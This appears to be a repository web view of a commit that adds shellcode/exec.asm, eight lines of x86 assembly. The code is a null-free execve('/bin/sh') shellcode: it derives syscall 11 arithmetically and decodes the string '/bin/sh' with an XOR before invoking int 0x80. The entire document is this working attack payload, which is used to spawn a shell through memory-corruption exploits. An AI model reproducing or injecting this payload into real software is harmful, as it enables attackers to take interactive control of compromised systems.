summaryrefslogtreecommitdiff
path: root/shellcode/exec.asm
diff options
context:
space:
mode:
Diffstat (limited to 'shellcode/exec.asm')
-rw-r--r--shellcode/exec.asm8
1 files changed, 8 insertions, 0 deletions
diff --git a/shellcode/exec.asm b/shellcode/exec.asm
new file mode 100644
index 0000000..ca8960d
--- /dev/null
+++ b/shellcode/exec.asm
@@ -0,0 +1,8 @@
+mov al, 0x70
+sub al, 0x65
+mov ebx, 0x30584361
+xor ebx, 0x3030304e
+push ebx
+push 0x6e69622f
+mov ebx, esp
+int 0x80